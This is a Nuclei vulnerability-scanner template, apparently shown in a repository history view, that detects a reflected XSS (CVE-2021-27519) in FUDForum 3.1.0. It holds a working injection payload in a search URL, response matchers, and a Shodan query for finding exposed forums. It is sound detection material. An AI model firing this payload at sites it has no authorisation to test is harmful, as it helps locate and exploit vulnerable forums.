nuclei-templates/cves/2021/CVE-2021-27519.yaml

44 lines
1.2 KiB
YAML
Raw Normal View History

2022-05-31 09:16:01 +00:00
id: CVE-2021-27519
info:
name: FUDForum 3.1.0 - Reflected XSS
2022-06-01 10:30:27 +00:00
author: kh4sh3i
2022-05-31 09:16:01 +00:00
severity: medium
2022-06-01 10:30:27 +00:00
description: |
A cross-site scripting (XSS) issue in FUDForum 3.1.0 allows remote attackers to inject JavaScript
2022-06-01 10:46:23 +00:00
reference:
2022-06-01 10:30:27 +00:00
- https://www.exploit-db.com/exploits/49942
- https://nvd.nist.gov/vuln/detail/CVE-2021-27519
- https://github.com/fudforum/FUDforum/issues/2
- http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html
2022-06-01 10:30:27 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-27519
cwe-id: CWE-79
metadata:
2022-06-01 13:33:12 +00:00
shodan-query: 'http.html:"Powered by: FUDforum"'
verified: "true"
2022-06-01 13:33:12 +00:00
tags: cve,cve2021,xss,fudforum
2022-05-31 09:16:01 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/index.php?SQ=0&srch=x"+onmouseover%3Dalert%281%29+x%3D"&t=search&btn_submit.x=0&btn_submit.y=0'
2022-06-01 13:38:57 +00:00
2022-05-31 09:16:01 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-06-01 13:33:12 +00:00
- 'highlightSearchTerms("x" onmouseover=alert(1) x="");'
2022-06-01 10:46:23 +00:00
2022-05-31 09:16:01 +00:00
- type: word
part: header
words:
2022-06-01 13:33:12 +00:00
- text/html
2022-05-31 09:16:01 +00:00
- type: status
status:
- 200